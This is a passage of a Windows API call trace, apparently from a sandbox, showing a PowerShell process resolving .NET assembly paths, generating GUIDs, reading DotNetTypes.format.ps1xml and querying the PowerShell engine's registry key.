	[0590.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0590.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0590.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0590.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0590.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0590.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0590.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0590.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x1ec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0592.210] VirtualQuery (in: lpAddress=0x1ebba0, lpBuffer=0x1eca60, dwLength=0x30 | out: lpBuffer=0x1eca60*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0592.211] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd6cf1786, Data2=0xfb10, Data3=0x45e2, Data4=([0]=0xb6, [1]=0x75, [2]=0x91, [3]=0x9b, [4]=0xb7, [5]=0xa7, [6]=0x4, [7]=0x71))) returned 0x0
	[0593.302] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x9fb45691, Data2=0xf9e4, Data3=0x4cd4, Data4=([0]=0x95, [1]=0xf6, [2]=0xfb, [3]=0xa7, [4]=0x4f, [5]=0x16, [6]=0x6f, [7]=0x4e))) returned 0x0
	[0593.303] VirtualQuery (in: lpAddress=0x1ebd50, lpBuffer=0x1ecc10, dwLength=0x30 | out: lpBuffer=0x1ecc10*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.304] VirtualQuery (in: lpAddress=0x1ebd50, lpBuffer=0x1ecc10, dwLength=0x30 | out: lpBuffer=0x1ecc10*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.305] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x586028e7, Data2=0x3e78, Data3=0x4013, Data4=([0]=0xae, [1]=0x67, [2]=0x77, [3]=0x15, [4]=0x5b, [5]=0x48, [6]=0xba, [7]=0x5d))) returned 0x0
	[0593.308] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x1c3ea74b, Data2=0x5936, Data3=0x409a, Data4=([0]=0xb4, [1]=0x8f, [2]=0xc2, [3]=0xaf, [4]=0x2d, [5]=0xde, [6]=0xf0, [7]=0xb9))) returned 0x0
	[0593.308] VirtualQuery (in: lpAddress=0x1ebfa0, lpBuffer=0x1ece60, dwLength=0x30 | out: lpBuffer=0x1ece60*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.309] VirtualQuery (in: lpAddress=0x1ebce0, lpBuffer=0x1ecba0, dwLength=0x30 | out: lpBuffer=0x1ecba0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.310] VirtualQuery (in: lpAddress=0x1ebce0, lpBuffer=0x1ecba0, dwLength=0x30 | out: lpBuffer=0x1ecba0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0593.322] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8c6912ed, Data2=0x7cf5, Data3=0x4e1d, Data4=([0]=0xb0, [1]=0xd, [2]=0xb1, [3]=0xfc, [4]=0x1e, [5]=0x1c, [6]=0x10, [7]=0xbd))) returned 0x0
	[0593.323] VirtualQuery (in: lpAddress=0x1eb610, lpBuffer=0x1ec4d0, dwLength=0x30 | out: lpBuffer=0x1ec4d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0593.323] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xcb4aecb9, Data2=0x8455, Data3=0x4c4b, Data4=([0]=0x94, [1]=0xdf, [2]=0x1c, [3]=0x7f, [4]=0x31, [5]=0x1b, [6]=0x2a, [7]=0x86))) returned 0x0
	[0593.323] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc360fd7c, Data2=0x2323, Data3=0x4718, Data4=([0]=0x8f, [1]=0x99, [2]=0x93, [3]=0x95, [4]=0x7a, [5]=0xa4, [6]=0x69, [7]=0xc))) returned 0x0
	[0593.323] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0593.323] GetFileType (hFile=0x324) returned 0x1
	[0593.323] SetErrorMode (uMode=0x1) returned 0x1
	[0593.323] GetFileType (hFile=0x324) returned 0x1
	[0593.323] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.326] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.326] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.326] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.326] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.327] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.327] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.327] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.328] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.329] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x1000, lpOverlapped=0x0) returned 1
	[0593.330] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0xbce, lpOverlapped=0x0) returned 1
	[0593.330] ReadFile (in: hFile=0x324, lpBuffer=0x2d5cc8e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5cc8e*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0593.330] ReadFile (in: hFile=0x324, lpBuffer=0x2d5d558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed078, lpOverlapped=0x0 | out: lpBuffer=0x2d5d558*, lpNumberOfBytesRead=0x1ed078*=0x0, lpOverlapped=0x0) returned 1
	[0593.330] CloseHandle (hObject=0x324) returned 1
	[0593.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.330] SetErrorMode (uMode=0x1) returned 0x1
	[0593.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed020 | out: lpFileInformation=0x1ed020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0593.331] SetErrorMode (uMode=0x1) returned 0x1
	[0593.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.331] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed108 | out: phkResult=0x1ed108*=0x324) returned 0x0
	[0593.331] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed08c, lpData=0x0, lpcbData=0x1ed088*=0x0 | out: lpType=0x1ed08c*=0x1, lpData=0x0, lpcbData=0x1ed088*=0x56) returned 0x0
	[0593.331] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a14a0
	[0593.331] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed05c, lpData=0x1b9a14a0, lpcbData=0x1ed058*=0x56 | out: lpType=0x1ed05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed058*=0x56) returned 0x0
	[0593.331] CoTaskMemFree (pv=0x1b9a14a0) 
	[0593.331] RegCloseKey (hKey=0x324) returned 0x0
	[0593.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0593.333] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x6260897b, Data2=0xa887, Data3=0x4638, Data4=([0]=0xad, [1]=0x4, [2]=0xb5, [3]=0x3a, [4]=0xab, [5]=0xaf, [6]=0xe4, [7]=0xd))) returned 0x0
	[0593.333] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd6452a06, Data2=0x741c, Data3=0x40a7, Data4=([0]=0xba, [1]=0x67, [2]=0xbc, [3]=0xd2, [4]=0x84, [5]=0xf3, [6]=0xc3, [7]=0x10))) returned 0x0
	[0593.333] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x4b69aaa8, Data2=0x104b, Data3=0x45b3, Data4=([0]=0xa3, [1]=0x2c, [2]=0x51, [3]=0x49, [4]=0x5c, [5]=0x95, [6]=0xb4, [7]=0x3a))) returned 0x0
	[0593.333] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xb86b794, Data2=0x299d, Data3=0x4cf9, Data4=([0]=0xad, [1]=0xc3, [2]=0xf0, [3]=0xf8, [4]=0x9c, [5]=0x77, [6]=0x82, [7]=0x5f))) returned 0x0
	[0593.333] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x7d79c36, Data2=0x7225, Data3=0x4fa0, Data4=([0]=0xab, [1]=0xbb, [2]=0x22, [3]=0xda, [4]=0x4d, [5]=0x97, [6]=0x66, [7]=0xb6))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xfd6285ac, Data2=0x17b4, Data3=0x459d, Data4=([0]=0xbd, [1]=0x85, [2]=0x41, [3]=0x3e, [4]=0x12, [5]=0x43, [6]=0x6e, [7]=0x2f))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xa8c42cf, Data2=0x2a54, Data3=0x4fb2, Data4=([0]=0x82, [1]=0x18, [2]=0xa6, [3]=0xc6, [4]=0xc5, [5]=0x71, [6]=0x5, [7]=0xa9))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xadecba4f, Data2=0x1204, Data3=0x4499, Data4=([0]=0xbc, [1]=0x59, [2]=0x29, [3]=0xc3, [4]=0x83, [5]=0x61, [6]=0x64, [7]=0x4))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x2696638c, Data2=0x2b03, Data3=0x4d7b, Data4=([0]=0x81, [1]=0x94, [2]=0x2c, [3]=0x90, [4]=0xb9, [5]=0x6c, [6]=0x13, [7]=0x80))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x329c1846, Data2=0xdbf9, Data3=0x4d3c, Data4=([0]=0x97, [1]=0x6b, [2]=0x4b, [3]=0xf3, [4]=0xe9, [5]=0xe8, [6]=0x83, [7]=0x78))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xeeeca395, Data2=0x4e46, Data3=0x4b51, Data4=([0]=0xae, [1]=0x11, [2]=0x12, [3]=0x8, [4]=0x27, [5]=0xe1, [6]=0x41, [7]=0x88))) returned 0x0
	[0593.334] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xd443ce6a, Data2=0x6b3c, Data3=0x4a00, Data4=([0]=0xb9, [1]=0x13, [2]=0xd6, [3]=0xe9, [4]=0x33, [5]=0xf0, [6]=0x25, [7]=0x65))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xe0863a29, Data2=0xb4bd, Data3=0x4c61, Data4=([0]=0xbb, [1]=0xc9, [2]=0x8c, [3]=0x19, [4]=0x8a, [5]=0x30, [6]=0x13, [7]=0x9d))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x898de3d7, Data2=0xbf0f, Data3=0x428d, Data4=([0]=0xa4, [1]=0x9c, [2]=0xf3, [3]=0xe6, [4]=0xce, [5]=0x6f, [6]=0x78, [7]=0x13))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x2280f4ab, Data2=0x27ce, Data3=0x4e08, Data4=([0]=0xbb, [1]=0xc2, [2]=0xfb, [3]=0xb9, [4]=0xd4, [5]=0xbb, [6]=0x75, [7]=0xbd))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x1773e422, Data2=0x1b05, Data3=0x40fa, Data4=([0]=0xb0, [1]=0xb, [2]=0x88, [3]=0x19, [4]=0x0, [5]=0x94, [6]=0x5c, [7]=0x19))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x6755513, Data2=0x39b6, Data3=0x49d5, Data4=([0]=0x85, [1]=0x16, [2]=0x89, [3]=0x83, [4]=0xb8, [5]=0xed, [6]=0x33, [7]=0x53))) returned 0x0
	[0593.335] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc1e4c3ca, Data2=0xb68a, Data3=0x42c3, Data4=([0]=0x94, [1]=0x53, [2]=0xc, [3]=0x43, [4]=0xf3, [5]=0x62, [6]=0x7a, [7]=0x6f))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x15e293ef, Data2=0xcac4, Data3=0x4745, Data4=([0]=0xa0, [1]=0xd1, [2]=0x93, [3]=0xf5, [4]=0x16, [5]=0xb8, [6]=0x84, [7]=0x2b))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3b603239, Data2=0x9563, Data3=0x4667, Data4=([0]=0x88, [1]=0x4d, [2]=0xc4, [3]=0x76, [4]=0x20, [5]=0x3f, [6]=0x49, [7]=0xe6))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xc5982862, Data2=0x32a1, Data3=0x4c74, Data4=([0]=0x95, [1]=0xce, [2]=0x9a, [3]=0xcf, [4]=0xb1, [5]=0x8f, [6]=0x6d, [7]=0xe7))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x272d9366, Data2=0xa8ff, Data3=0x4cde, Data4=([0]=0xb2, [1]=0xbf, [2]=0x1e, [3]=0xca, [4]=0x26, [5]=0x36, [6]=0xc4, [7]=0x2b))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x94f4f015, Data2=0x105b, Data3=0x4f99, Data4=([0]=0xa3, [1]=0xe7, [2]=0x48, [3]=0xdb, [4]=0xc6, [5]=0xa7, [6]=0x2c, [7]=0xb6))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xf219072b, Data2=0x3782, Data3=0x4044, Data4=([0]=0xa2, [1]=0xb, [2]=0xbe, [3]=0xbd, [4]=0xff, [5]=0xa3, [6]=0x2b, [7]=0xf))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x13579d28, Data2=0xd1a8, Data3=0x48e9, Data4=([0]=0x88, [1]=0x84, [2]=0xfc, [3]=0x32, [4]=0xaf, [5]=0x0, [6]=0x2f, [7]=0x81))) returned 0x0
	[0593.336] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xda2109ca, Data2=0x3f66, Data3=0x4f94, Data4=([0]=0x9e, [1]=0xa9, [2]=0x9b, [3]=0x44, [4]=0xfe, [5]=0x97, [6]=0x26, [7]=0x30))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8227f8dd, Data2=0x6787, Data3=0x4eca, Data4=([0]=0xa1, [1]=0x2c, [2]=0x48, [3]=0xb5, [4]=0xba, [5]=0xbe, [6]=0x3e, [7]=0x5d))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x8df6c109, Data2=0x6cda, Data3=0x4ada, Data4=([0]=0x91, [1]=0xf6, [2]=0xbc, [3]=0x98, [4]=0xed, [5]=0x46, [6]=0x5b, [7]=0xbd))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x596cd3e, Data2=0x6f99, Data3=0x48db, Data4=([0]=0xa1, [1]=0x6d, [2]=0xae, [3]=0x9, [4]=0xd0, [5]=0xf2, [6]=0xd1, [7]=0xd5))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xef791d07, Data2=0x6f0c, Data3=0x43b7, Data4=([0]=0x95, [1]=0x37, [2]=0xbc, [3]=0x72, [4]=0xdf, [5]=0x29, [6]=0x1a, [7]=0xf2))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x5e7c8391, Data2=0x9276, Data3=0x414f, Data4=([0]=0xb0, [1]=0xc3, [2]=0x92, [3]=0x16, [4]=0x44, [5]=0xb2, [6]=0x2b, [7]=0x5c))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x7a27781d, Data2=0x2738, Data3=0x4d62, Data4=([0]=0xab, [1]=0x3a, [2]=0x52, [3]=0xd6, [4]=0xf4, [5]=0x8e, [6]=0xcb, [7]=0xef))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x2b346b81, Data2=0x32f8, Data3=0x47ad, Data4=([0]=0x91, [1]=0x81, [2]=0x86, [3]=0xd5, [4]=0x34, [5]=0xf5, [6]=0xbf, [7]=0x2c))) returned 0x0
	[0593.337] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xa9647a65, Data2=0xb5ca, Data3=0x456f, Data4=([0]=0xb5, [1]=0x64, [2]=0x94, [3]=0x23, [4]=0xfe, [5]=0x55, [6]=0x58, [7]=0x12))) returned 0x0
	[0593.338] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xe9ac2bef, Data2=0x8b72, Data3=0x4a64, Data4=([0]=0xa4, [1]=0x7c, [2]=0x98, [3]=0x83, [4]=0x7a, [5]=0x9a, [6]=0xa3, [7]=0x7c))) returned 0x0
	[0593.338] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0x3175df6c, Data2=0xb112, Data3=0x4696, Data4=([0]=0xa3, [1]=0xb1, [2]=0xd4, [3]=0x5c, [4]=0x60, [5]=0x95, [6]=0xe2, [7]=0xd))) returned 0x0
	[0593.338] CoCreateGuid (in: pguid=0x1ed330 | out: pguid=0x1ed330*(Data1=0xe3dcc27a, Data2=0xf796, Data3=0x4489, Data4=([0]=0xbe, [1]=0x11, [2]=0xb7, [3]=0xb6, [4]=0x8f, [5]=0x82, [6]=0x39, [7]=0x9d))) returned 0x0
